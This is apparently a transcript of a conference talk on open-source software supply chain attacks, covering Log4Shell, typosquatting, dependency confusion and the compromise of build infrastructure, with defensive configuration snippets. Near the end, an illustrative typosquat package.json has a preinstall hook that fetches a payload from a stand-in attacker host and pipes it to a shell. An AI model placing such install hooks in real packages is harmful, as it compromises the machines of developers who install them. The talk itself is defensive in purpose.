Can someone grab the door over there? Here comes everybody all at once. All right, thanks for coming. My name is Brian Fox. I'm co-founder and CTO at Sonatype. A little bit of my background: years and years ago, I was one of the core committers on Apache Maven, the build system. I was on the project management committee, and I was the chair for a long time. And for those of you that don't know, Sonatype has always been the company that runs what the world knows as Maven Central. So where the world gets their open source Java, that's been us for like 20 years.

In the early days, we were very much focused on helping large companies manage their builds and their dependencies, understand what's going on, and optimize that through training and consulting around Maven. Somewhere along that journey, around 2009, 2010, we started to see companies asking us: how do I do a better job of managing the dependencies my developers are using? Back then it was very much focused on licensing — everybody was afraid of the GPL and the AGPL. But we could see through some of the early vulnerabilities, ones the world has long since forgotten, that people weren't following good practices in terms of updating their dependencies. The most popular version of Bouncy Castle, a crypto library, was the one with the level-10 vulnerability, years after the fix was released. Now, you're probably all here at Supply Chain Con because that problem has not been solved, or we wouldn't be here talking about it. But we saw this back in 2009, 2010, and started trying to figure out how we could help the world move forward.

A large part of what I've been focused on in that time is helping the organizations at the end of all the stuff we just heard about — this great talk about GitBOM and all these things about provenance. From my perspective, we're still in a world where the end-user consumers don't have supply chain practices that enable them to do anything when the inevitable vulnerability, like Log4j, happens. And that's where I want to spend my time. Because from that long perspective, I've seen us move through three or four phases, and I think the world is still very much stuck on solving the problem of phase one, when the attackers have actually moved several steps ahead of that.

So, just for context, these are the downloads from Maven Central. There's no evidence that Java is dying off anytime soon; we're on track for somewhere over 600 billion downloads from Maven Central these days. JavaScript looks the same. If you look at the chart for Docker, really any of the repositories out there, they all have this great hockey-stick curve showing that the world is consuming more and more open source, more of it pre-built binaries. So in the context of that last talk about trust — well, people are just consuming them, so we'd better hope we can trust them. The supply of these things continues to explode: newer versions, newer projects, projects onboarding onto Maven Central, always huge numbers. The world is building more and more open source. Just like Eric said in the keynote today: we were successful, and this is the result of it. The demand is exploding too; these are just different views of those same numbers, and you can see it across all these different ecosystems. The point is, there's lots of open source, and the reality is that supply chains are everywhere in this process.
And importantly, supply chains are obviously not originally a software problem. This was W. Edwards Deming — probably everybody here has heard this, it's been beaten to death, but I'm going to repeat it anyway. Deming helped the Japanese auto industry rebuild after World War II, and go on to produce some of the most efficient, cheapest-to-produce, reliable vehicles that we've all grown to know and love. He did it by focusing on several key areas: choose better parts from better suppliers, use only the highest quality parts, don't pass defects downstream, and importantly, continuously track the location of every part. We've all come to expect this of our physical goods. As engineers, we always seem to like to reinvent the wheel, but we've been looking at this for a long time and realized: you know what, we're not the first industry with a supply chain problem, and the others have solved it.

I like to talk about a couple of examples here, because I think they contextualize what is happening in software and how ridiculous it would look in the real world. This is the Chevy Cobalt. I think it was around 2014 that there was a problem with the ignition switches. The engineers, somewhere along the line, had found a problem with the switch: if you had a heavy key chain hanging from it, it could cut off power, and people would lose power steering and brakes. Ultimately, some people unfortunately died as a result. What's interesting when you dig into the details is that they made a classic configuration management mistake. They found the bug, they fixed it, and they didn't rev the part number of the ignition switch. So when cars started to crash and the investigation began, it delayed investigators' ability to figure out what the problem actually was, because they were taking these parts off and testing them, and the parts tested out fine — the classic "works for me on my machine," right? Ultimately they figured it out, but because the part number was never bumped, they had to recall literally all the cars, because they had no way of knowing which cars had the original rev and which had the fixed-but-not-revved version. So in the world of physical goods, a mistake that used to happen a lot in software has a very big impact.

The counterexample is the Boeing 787. When it first launched, there were three or four instances of a plane catching fire — fortunately, at the gate. They figured it out very quickly because they had great configuration management processes. They understood quickly that all three or four batteries that caught fire came from the same manufacturer and the same lot; they found the other ones and pulled them out. We've all forgotten this happened. It was not a 737 MAX type of situation. It was scary at the beginning, but because they had good practices, the results were very different from the Cobalt situation.

And then a few years ago, here in the US, for I think about three years in a row, we had E. coli outbreaks with lettuce.
The last big one was a similar problem to the Cobalt: by the time people were getting sick and the investigation was underway, the growing season had moved from Yuma to California, so they couldn't figure it out for a very long time. So what did we do? We literally threw out all the lettuce in basically all of North America. That's an economic disaster, an ecological disaster, all of it completely preventable if we had just done a better job of labeling the origin of the parts. After three years of this, the industry finally did. I don't know that in all cases they label it down to the farm, but they at least label the region of origin, so now we can choose which parts to throw out. These are important supply chain concepts that we as consumers expect of our physical goods — we expect it of the planes that brought most of us here, and of the food we're eating. But if you think about your own software practices, they're probably not as good as that. That's why we're all here talking about this.

In terms of how supply chain attacks have evolved over the last 10 to 12 years, from my perspective the first phase was really about exploiting existing vulnerabilities. A lot of the discussion that's been going on here — improving the software, improving vulnerability disclosure — is very much focused on this, and that's a necessary thing to do. I'm going to breeze through these a little, but the first big one from our perspective was an early Struts vulnerability in 2013. This happened at the same time Anonymous was doing a lot of their stuff, and a lot of banks were taken down by this particular vulnerability. They didn't make big public statements about it, they didn't get hauled in front of Congress, but it happened. It was so widespread that the FBI issued field alerts saying: hey, you need to go talk to your banks, because they're probably being attacked by this. It was point-and-click in a Chinese hacking toolkit; it was pretty much as bad as it could be. The world didn't pay attention, but a lot of our clients did, and they started to get religion around: hey, we need to do a better job of understanding what's in our software and actually managing it.

The following year was Heartbleed and Shellshock — again, vulnerabilities that had been latent in open source for a very long time before everybody realized they were starting to be exploited. And then of course there was the Equifax example. I left the slide out because everybody's tired of looking at it, but the point is that all of these things existed in the software, and as far as I know, all of them went through a pretty good responsible disclosure process — and yet people still got attacked. The Equifax attacks largely happened days after Apache fixed and released the updated versions, because Equifax, the consumer in that case, didn't upgrade all of their servers. Same thing with these other vulnerabilities. And frankly, Log4Shell, which we'll get to, was basically that same class of problem — from my perspective, kind of old and boring.

Some of these attacks have real social harm. In 2015, there was the Commons Collections vulnerability. This is a popular library in Java. It's like Log4j: it can be assumed to exist on the classpath of basically every Java application.
If it's not in your application, it's almost certainly in your web application server. This didn't have quite the impact of Log4j because it was a little bit harder to exploit — it was a deserialization type of attack. But this is Hollywood Presbyterian Hospital. They were taken down by ransomware for over a week, and it was traced back to this vulnerability, which, by the way, had been disclosed at DEF CON and patched almost a year before this attack happened. So again: open source in this case did a great job of responding to the vulnerability and fixing it, but the end users didn't update, and then bad things happened.

We used to say you can't put a name on people who died — there was nothing in the news about it — but statistically it's provable that this almost certainly killed somebody. There are statistics showing that if you have a heart attack in New York City or Boston on marathon day, your mortality is significantly altered, simply because the ambulances have to route around the marathon course. Now imagine what happens when a major hospital in a major metropolitan area is taken offline for a week: tests get delayed, surgeries don't happen, people have to be transferred. People almost certainly were affected by this. There was a more recent attack — I think it was Mercy Hospital in the UK — where somebody's name actually was in the headlines: this person had to be transferred from the hospital that was hit by ransomware to another one, and they died because of it. So these bugs, and the failure to update, have already had huge impacts on real people. We always say people don't act until people die. Unfortunately, that's already been happening, and yet, from my perspective, too many companies are still not doing the right thing.

Then of course there's Log4j — Log4Shell. This one was like the combination of that early Struts vulnerability, which was super easy to exploit and affected you basically if you just had it on your classpath, with the widespread nature of Commons Collections, which can be assumed to be in almost every Java application. It was as bad as it could get. These are statistics we started publishing on our website from the Maven Central downloads, and you can see that in the early days a lot of people upgraded pretty quickly. But we never really got past the 60% point, which wasn't super surprising early on. What is really disappointing is that six, seven months later, we've basically flatlined: about 40% of the world, as of today, is still downloading vulnerable versions of Log4j. There can be only one answer to that. They're not doing it on purpose; it's that they don't know what's in their software. They don't have an organizational bill of materials, as we call it, to even see that this is still happening.

Some people were asking me before this talk: was Log4Shell just much ado about nothing? We didn't see anybody getting attacked. My answer was: well, everybody learned in the wake of Equifax and Struts not to raise their hand and say, "we got attacked because we didn't update this dependency." So we're not hearing about it. That doesn't mean it didn't happen. And there was a report that came out — I think around March 8th — indicating that APTs were actively leveraging this. So this stuff is happening even if we're not hearing about it in the news.
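As an aside, to make that Commons Collections class of bug concrete: the dangerous pattern is a one-liner, and so is the modern mitigation. Here's a minimal sketch — the class and method names are invented for illustration, and this is the general pattern, not the specific exploit used against the hospital:

```java
import java.io.ByteArrayInputStream;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;

public class DeserializationSketch {

    // The vulnerable pattern: deserializing untrusted bytes. With a gadget
    // library such as the old Commons Collections on the classpath, the call
    // to readObject() alone can execute attacker-controlled code -- the cast
    // afterwards never even has to succeed.
    static Object unsafeRead(byte[] untrusted) throws Exception {
        try (var in = new ObjectInputStream(new ByteArrayInputStream(untrusted))) {
            return in.readObject(); // gadget chains fire here
        }
    }

    // One mitigation, available since Java 9: an allow-list filter that
    // rejects every class except the ones you actually expect.
    static Object saferRead(byte[] untrusted) throws Exception {
        try (var in = new ObjectInputStream(new ByteArrayInputStream(untrusted))) {
            in.setObjectInputFilter(
                    ObjectInputFilter.Config.createFilter("java.lang.*;java.util.*;!*"));
            return in.readObject();
        }
    }
}
```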
Either way, you can be guaranteed that people are being affected by this, even when it doesn't make the news. So why is this happening? Think about the economics for a moment. The first time I saw these statistics they shocked me, and I thought I already understood how bad the problem was. In 2016, the illicit drug trade as an economy was estimated to be worth $435 billion. That's what, six years ago? Cybercrime was already a bigger industry back then: $450 billion. And when you think about how much time and energy society spends on the war on drugs and the opioid crisis, compared to how little, until very recently, we spent talking about cybercrime — that's a bit shocking. It seems like we've been focused on the wrong problem. The projections have tracked, too: cybercrime was estimated to cost us as a society $6 trillion last year. If that were an economy, it would be the third largest in the world, after the US and China. Projecting forward a little — I'm not sure I believe it levels off — they estimate $10.5 trillion by 2025. One way to think about this: that is the funding aligned against all of us here trying to do the good thing. It's the VC investment, the money driving the bad actors to find every single chink in our armor. That's a big adversary.

Phase two I've called "creating opportunities." Remember, phase one was existing bugs — boring bugs that were already there; people figured out how to do bad things with them, they were disclosed, and the bad actors raced to exploit the gap between the world understanding and consumers upgrading. Phase two started around 2017. There was a report that came out showing that 14% of the packages in the npm repository were published by people who had "password" as their password, or who had checked their password into GitHub. It was kind of a big deal — they revoked all the tokens and all that — but for me it was interesting because I had never seen it called out so blatantly that publishers had such poor diligence around their own security. And then, just a few weeks later, we saw two different attacks, one on npm and one on Python, that were starting to do typosquatting. That wasn't particularly surprising in itself, but what was really interesting from my perspective was that both of these attacks were focused on exfiltrating the password tokens of the publishers. They weren't about getting into some piece of software and doing damage there; they were going after all of us, the open source maintainers. That was the first time I had ever seen that, and I had that moment of: does anybody else see this? This is kind of crazy.

For years after, we kept talking about this, and I started tracking it, because that seemed to be the moment the attackers finally started paying attention to the supply chain. There was a whole series of follow-on incidents, and it looked to me like they were sharing best practices, iterating, and getting better and better at finding different ways to exploit the supply chain. At the end I'll show a link where you can read more about these, but the evolution of those attacks over the following couple of years was really interesting to watch unfold in real time.
The reason this happens: like any other engineers, attackers seek the most efficient path. There's a lot of money behind them, but they want things as cheap and easy as they can get them. There was a study that looked at the combined reach of the 100 most influential maintainers on the npm repository, and inversely, how tightly integrated the top five npm packages were into everything else. You have a massive consolidation of risk in a small number of contributors. If you could steal one of those contributors' tokens, you could reach about half of the packages in the repository at that time. That's pretty scary. And if you can slip something into one of those top five projects, you get yourself hundreds of thousands, millions of downloads almost immediately. This is why they're moving up the supply chain: it's a force multiplier.

The next phase is the phase we're really in now, and I don't see enough people focusing on it: attacks aimed at the developers and the development infrastructure itself. Everybody's thinking about what happened with Log4j and their vulnerabilities — attackers getting into the applications, or things like Equifax, where they went in through Struts and stole the data. But most of the newer attacks look more like what happened with Codecov, and even SolarWinds: the attackers are trying to get into the development infrastructure itself, because it holds the keys to so much of the kingdom.

This was one of the first ones we were tracking. Back in 2018, somebody mined a whole bunch of Bitcoin — probably still worth a lot even after the crash, and this was a long time ago. They found an unpatched Jenkins server, attacked it, and used cloud build capacity that somebody else was paying for to mine Bitcoin into their own wallet. Then last year there was a more interesting one. It was a similar situation, but the attackers actually used the development infrastructure to move sideways inside the organization, and were able to breach a bunch of camera feeds — camera feeds at hospitals, police stations, daycares, and a Tesla plant. This shows that development infrastructure can be a significant way into the rest of the organization, especially when you think about production systems: your development infrastructure almost certainly holds, somewhere, the secrets needed to get onto your cloud. That makes it a super juicy target.

The Codecov incident was a similar one, but it unfortunately went downstream to their users. Codecov was a tool that helped people assess the coverage of their unit tests. The attackers found a vulnerability in that container, which then left all of Codecov's users open to supply chain attacks directly in their own infrastructure. I lost track of all the different incidents that spun out of that one, but it was pretty significant. So again, there are a number of these incidents, and they're focused not on stealing personal data; they're focused on stealing your credentials and your passwords. In some cases they're printing money, and in many cases they're leaving backdoors. In fact, early last year, a white hat researcher released what he called the dependency confusion attack.
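Before the mechanics of that attack, it's worth seeing how small the consuming-side fix is: make your builds resolve names only from places you control. A minimal npm sketch — the internal proxy URL and the @acme scope here are hypothetical, invented for illustration:

```ini
# .npmrc -- route all resolution through one internal proxy,
# and pin the private scope so @acme/* can never fall back to the public registry
registry=https://repo.example.com/npm-group/
@acme:registry=https://repo.example.com/npm-internal/
```

It's the unscoped, unpinned internal names that the attack abuses.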
In some of these ecosystems, if you don't have something like a repository manager to control where your developers are getting their dependencies from, the default behavior is exploitable. People figured out that if you knew a company was using a package called Foo internally, and you went to npm and published Foo with a high version number, those build systems would fetch your version from the public repository. He did it as a proof of concept, but almost immediately — we were tracking this — we saw tons of copycat attacks. Everybody was after the bug bounties right away. But what I told my team, and what really worried me, was that somewhere in that noise would be the actual attackers. Every time something like this comes out, you don't have enough time: everybody looks at it, thinks "that's a great idea," and piles on. Within the first 72 hours there were 300 copycats, most of them running the same prototype code, looking for the bug bounties. Within about a week, the number of suspicious things we were tracking in our systems went up 7,000%, all of it as a result of this. That was just one week. It actually took a few more weeks before we really started to see the malicious ones show up — I was surprised; they were a little slower than I expected — but they did show up, and it continued on until we eventually stopped counting. The attackers were using the prototype code to do the same thing: attacking companies, dropping payloads in, stealing command lines, all those kinds of things. It follows the same pattern we saw with Equifax: once the technique becomes known — in the Equifax case a vulnerability in Struts, in this case a new and novel way to insert malicious code into the supply chain — you don't have much time to respond.

In one of the reports we published last year, we showed these numbers. We had seen 216 of these incidents in that first window, from 2017 to 2019. The following year it exploded 430%, up to about 1,100, and last year it was another 650% increase. This is the new norm. This is what's happening. And none of it has anything to do with a lot of what the world is talking about right now, like how to make open source itself more secure. It has everything to do with the fact that consumers are not paying attention to what their developers are using, leaving their supply chains wide open to attack.

When this started happening and I started talking about it, some of our customers asked: well, what do you do about it? How do you prevent these things? Because the moment these packages hit the repository, they're malicious — they're designed to cause harm, and you have zero time to respond. It's not even like the Struts situation, where there were three days; you've got nothing. As soon as your developers touch one of these, they may have had a backdoor dropped on their system. So we started building systems for this. We took a page from the credit card companies: build models around the repositories to understand what's normal for a project — when they release, who does the releases, what kinds of dependency changes are normal for big projects — and feed that to ML tools to help identify these things. At first, I thought we were basically building an asteroid-hunting tool: one where I wouldn't know when we missed something, because hits would be so rare.
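Just to illustrate the idea — and this is a toy, not our actual model; every weight and threshold here is invented — the kinds of signals I'm describing could combine something like this:

```java
import java.util.Set;

// A toy anomaly score over a few of the release signals mentioned above.
// A real system would learn these weights and baselines per project.
public class ReleaseAnomalySketch {

    record Release(String publisher, double daysSinceLastRelease,
                   int newDependencies, boolean addsInstallScript) {}

    static double anomalyScore(Release r, Set<String> knownPublishers,
                               double typicalCadenceDays) {
        double score = 0.0;
        if (!knownPublishers.contains(r.publisher())) score += 0.4;          // unfamiliar releaser
        if (r.daysSinceLastRelease() < typicalCadenceDays / 10) score += 0.2; // way off normal cadence
        if (r.newDependencies() > 5) score += 0.2;                            // unusual dependency churn
        if (r.addsInstallScript()) score += 0.2;                              // brand-new install-time hook
        return score; // above some threshold: quarantine pending human review
    }
}
```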
But actually, as soon as we turned it on, we started to flood our own security team with valid findings. As of last month, we've identified 87,000 packages in the last year that were actively malicious. Over 15,000 of those we've had to submit to repositories to get taken down — not all of them rose to that level, and there were simply too many for us to flood npm and PyPI and the other repositories with. But the number is astronomical. So when we see people talking about "we found 200 zero days" or something like that — that's phase one. We're in phase three. This is what's happening in the world right now.

And again, all of the things we're talking about within the OpenSSF — funding projects, helping people do a better job, making open source better and safer — that has to happen; that's obvious. But from my perspective, if the consumers don't do a better job of actually managing their open source, a lot of it is for nothing. No matter how hard we try, the software is written by humans, and there are always going to be vulnerabilities. It's like an auto manufacturer saying, "my suppliers got good enough at making parts, so I don't have to track the parts in my cars anymore." We know that's ridiculous; there are always going to be mistakes. So I'm trying to make sure the end users are focused on this part of the problem as well, because it's something they can do now. All these other things — producing better SBOM standards, educating the open source developers — will take time, and they need to happen. But if we leave those consumers thinking they can just sit back and wait, they're leaving themselves open to massive vulnerabilities in the meantime.

I'm going to jump ahead a little here. This was one of the surveys we've been doing annually — this year will be the eighth year — and by the way, it tracks with some of the data the Linux Foundation released today. As of last year, 50% of respondents said they used some process. That's pretty good, because eight years ago when we first tracked it, it was in the teens, like 15%. So 15 to 50 feels good — until you think about it this way: what if, in those physical-goods industries, only 50% of companies tracked their parts, and only 30% had any mechanism to do a recall? Would we feel like that's a good situation? I don't think we would. So we shouldn't celebrate. We're making progress, but we still have so much further to go.

What I like to leave people with is this: you have a supply chain, even if you don't manage it. You'd be surprised how many companies I talk to who are completely in the dark about this. If you ignore it, the problem doesn't go away, and the attackers are exploiting it whether you're doing anything about it or not. And this self-evaluation is one I've always used — the world went through it on December 9th with Log4j. If I told you about a new vulnerability, would you even know whether you're using that exact component? So much of the world had no idea they were using the vulnerable versions of Log4j; in fact, as I showed you, 40% clearly still don't, because they're still downloading them today. Do you know which applications it's in? Can you track that remediation, and how long would it take you to ship and deploy an update? Because in these cases, the attackers are moving on you instantly. And worse: how would you avoid the next malicious release, when you have zero time to respond?
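For the first couple of those questions, at least in the Java world, even a one-liner is a start. A sketch — the per-application SBOM directory layout here is hypothetical, just for illustration:

```sh
# Is this exact component anywhere in this build's dependency graph?
mvn dependency:tree -Dincludes=org.apache.logging.log4j:log4j-core

# And across the portfolio, if every application emits an SBOM at build time:
grep -l '"name": "log4j-core"' sboms/*.json
```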
And this next one is really interesting, especially in the world of COVID, where so many developers have moved home. Those developers now lack the perimeter defenses they at least had in the office — the firewalls, the blocking of data exfiltration that might have detected these backdoors being dropped on their systems at work. Are they covered as well at home? At some big companies, probably yes. Across much of the rest of the world, no.

What I'm seeing in developer behavior looks very much like the 1990s. Remember when browsers were inherently vulnerable and just visiting a bad website got you hacked? What did those attackers rely on? They relied on somebody going to the website, saying "oh crap, that's not the site I thought I was at," hitting back, going to the real one, and never bothering to check or even consider that they'd been attacked. That is exactly what's happening with developers right now when they pull down one of these typosquatted components. The components aren't even trying to build. They're not trying to masquerade as the valid component. Literally all they do is drop a backdoor or exfiltrate keys or whatever, and they do it in seconds. So the developer grabs a component, runs the build, it fails, they go "whoops, got the wrong one," fix it, move on with life, and check it in. Now, if you're an application security team focused only on what actually gets checked in and built, you completely miss that part of your development infrastructure may just have been attacked. It's interesting, because these patterns repeat over and over; it's just the technology that moves. What we saw in user behavior in the browser is what we're seeing in developer behavior with dependencies right now.

Lastly, I like to remind application security teams, when they think about Deming's principles: Deming and traditional supply chain practices are focused on the end product — on the cars, on making the cars better. You should, and need to, have good practices around that; it's table stakes. But merely doing a good job of that does not protect your factory. What do I mean by that? If your application security teams are only paying attention to what is about to ship to production or to your customers, you completely miss the entire phase-three war that's happening right now. You will not see the backdoors dropped on your developers' machines. You won't see those kinds of upstream attacks.

And then there's one piece of data we found a couple of years ago that I still like to show. We talked to hundreds of customers — hundreds of people filled out the survey — and we classified them into teams focused on security at all costs (the hardcore; that's all they focus on), teams focused on shipping really fast, with security as an afterthought, and teams that had security fully integrated, and we looked at how they compared. And I think the world would pretty much not be surprised if I stood here and said, you know what?
In order to do all of these things well, you need to pay attention to security, and you're going to take a hit on your performance — paying attention to security is going to be slower than only caring about going fast. That seems logical, right? Except the data shows that it's not true. The highest performers were in fact the ones who cared about being agile and iterative and cared about managing their supply chain. It seems counterintuitive until you stop and think: just because a team doesn't care about its supply chain doesn't mean it won't, at some point, have to stop and go back and fix one of these vulnerabilities it didn't plan for. That unplanned work — rework — is actually costing them performance. So the irony is that the way to go fast is to manage the supply chain, not to just try to go fast. I think that's a pretty interesting outcome. You really can have your cake and eat it too.

And lastly, I'll leave you with this link. You can get access to all of the historical material I showed, all the details. We're compiling the results of the eighth annual survey right now; it'll come out in a couple of months. But all of those charts, and detailed writeups of everything I showed, are available there. So that's the talk. Anybody have comments or questions? We have some time left.

No, no — I try not to get too jaded or too down on this, because we are making progress. The fact that we're here at a conference called Supply Chain Con indicates we've come a long way. I tell this story a lot: when we first started trying to solve this, we did what we always did when we built the company, which was open source first. That's how we made Maven successful, and it's how we made Nexus Repository successful. We built free tools that showed developers the licenses and the vulnerabilities of the components they were using. Nobody used them. So I went out and started talking to people. I talked to other open source developers, who should have known better, and one told me — this is close to a direct quote, because I'll never forget it — "I don't have to worry about the security of my open source components, because I have a firewall and I have a security team. All I have to worry about is the AGPL." So in 2011, that was the general state of understanding of what we're talking about here. Again, now we're at Supply Chain Con, which means we're headed in the right direction. There's progress, but there's still so far to go, as evidenced by the fact that Log4j is still being downloaded in the wrong, vulnerable versions 40% of the time.

Yeah — so I get this question every time. The question is: why are those versions still available? For the first time in a long while, with Log4j, while this was happening in the moment — Jonathan, you probably hit me on Slack a couple of times — we actually talked to the Apache Log4j PMC and some of the other leaders at Apache. One of the fundamental principles of Maven Central is that the repository is immutable. We don't change these things. Once artifacts are in there, you can't remove them unless there's a copyright issue, or unless they were actually malicious, in which case we'd take them down. But it's intended to be immutable, and that's the norm. Still, if there was ever a case for taking something down, it was Log4j. So we got together and started talking. And what we felt at the time — now, seven months later, this might be a bit of a different story —
we haven't talked to them lately — was that we don't want to be in the position of playing God and deciding for the world which books to burn and which not to. And in the moment, we saw many companies actually doing a good job of triaging this. Those companies were presumably focusing their available resources — remember, this was just before Christmas — on patching their most vulnerable applications. If we had unilaterally taken down every other version of Log4j, by definition we would have broken every other part of their portfolios. We would quite literally have pulled the brain surgeons out of surgery to go put band-aids on knees, right? It sounds simple to just remove these things, but because of the way the ecosystem works, you're effectively breaking every other single build, more or less permanently, until somebody takes an action. Now again, because Log4Shell was so bad, we did stop and ask the team the question: should we do this? We weren't going to do it unless the Log4j PMC was on board. And there wasn't agreement even within that team, because removal masks the problem in some sense: people would just find the jar from a previous build, jam it in, and then have no way of knowing. So it's not as simple as it seems, and I wish there were a better answer than putting the onus back on the end user to actually pay attention to what's in there. If we break this one build for Log4j, where does it end? Do we start breaking builds on level-5 vulnerabilities? Level 6? Level 7? There's no great answer. So that's why. Go ahead.

So, will it have the same effect as financial regulations like Sarbanes-Oxley? I think we might get there. There was the FTC quote mentioned either yesterday or earlier this morning that basically said: we're paying attention, companies. If we find that you've been attacked because of this, we will consider it negligence. You can't claim not to have known that something like Log4j was vulnerable; not doing something about it was negligent. I think we're moving in that direction, especially if the industry doesn't get its act together. The executive order was a move in that direction. Interestingly, there was a proposed bill in front of Congress in 2013 with basically the same words — the executive order didn't come out of nowhere; it recycled a bill that failed to make it to the floor in 2013. So we could have been seven, eight, nine years ahead even on the regulatory side. But I think we'll probably get to that situation at some point.

Yeah — have we thought about... sorry? At Sonatype, we have. With some of our products, like the repository manager, customers are already proxying everything, because it gives them better efficiency and more control. That's part of why we created the early-detection capability I talked about: the credit-card-fraud-style algorithms work in conjunction with that. So what happens is, as soon as an artifact gets released, say to npm, our systems look at the data and can essentially make a real-time decision. Just like when you swipe your credit card somewhere, and the systems ask: is this really you? Is it normal for Brian to go to Best Buy and buy a TV in San Francisco when he lives in New Hampshire? No, it's not.
So our systems are doing that, and it works in conjunction with what we call the firewall product, which basically stops any downloads at the customer's site until our security team can confirm or deny the finding. It lets them defer any consumption of that artifact. And it's been pretty effective — like I said, keeping track of 87,000 malicious things in the last 12 months is something nobody could ever do by hand. That's how we were ultimately able to respond and help protect against this, because it's the only way. Again, if a developer downloads one of these things and its npm install script drops a backdoor, it's too late at that point. How do you stop it? You stop it from ever getting onto the machine. That's why working with the repository manager to firewall this off is the way to do it. Okay, we're out of time. Thanks, everybody, for coming. Hopefully you learned something — go off and tell your friends.
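To make that last point concrete: a hypothetical typosquat needs nothing but an install hook — the package never has to build or even pretend to work. Everything here, the lodash-lookalike name and the URL, is invented for illustration:

```json
{
  "name": "lodahs",
  "version": "99.9.9",
  "scripts": {
    "preinstall": "curl -s https://attacker.example/payload | sh"
  }
}
```

And the choke point such a repository firewall needs is just routing: one mirror that every download must pass through, where a quarantine policy can veto an artifact before it ever reaches a developer's machine. A minimal Maven-side sketch, again with an invented URL:

```xml
<!-- ~/.m2/settings.xml: force every Maven download through one internal proxy -->
<settings>
  <mirrors>
    <mirror>
      <id>corp-proxy</id>
      <mirrorOf>*</mirrorOf>
      <url>https://repo.example.com/maven-group/</url>
    </mirror>
  </mirrors>
</settings>
```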